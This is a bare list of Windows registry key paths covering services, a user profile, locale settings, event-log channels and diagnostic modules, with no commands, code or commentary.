HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Environment
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment\0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityParam
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\ImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityAppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DeferredCoInitializeSecurityServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\SystemCritical
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\svchost.exe
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceMain
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialUserCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumUserCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\eventlog\System\Application Popup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\Application Popup\ProviderGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-ReliabilityAnalysisComponent/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ChannelAccess
HKEY_CURRENT_USER\Software\Classes\AppID\taskhost.exe
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\DiagnosticModules
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}
